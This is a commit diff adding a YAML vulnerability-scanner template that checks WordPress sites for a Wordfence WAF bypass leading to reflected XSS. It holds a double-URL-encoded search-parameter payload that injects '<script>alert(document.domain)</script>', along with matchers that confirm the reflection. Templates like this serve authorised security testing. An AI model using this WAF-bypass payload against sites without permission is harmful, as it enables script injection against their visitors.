Added wordpress-wordfence-waf-bypass-xss
parent
890910b4f0
commit
36195f82a0
|
@ -0,0 +1,29 @@
|
|||
id: wordpress-wordfence-waf-bypass-xss
|
||||
|
||||
info:
|
||||
author: hackergautam
|
||||
name: Wordfence WAF Bypass WordPress XSS
|
||||
reference: https://twitter.com/naglinagli/status/1382082473744564226
|
||||
severity: medium
|
||||
tags: wordpress,wordfence,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- <script>alert(document.domain)</script>
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue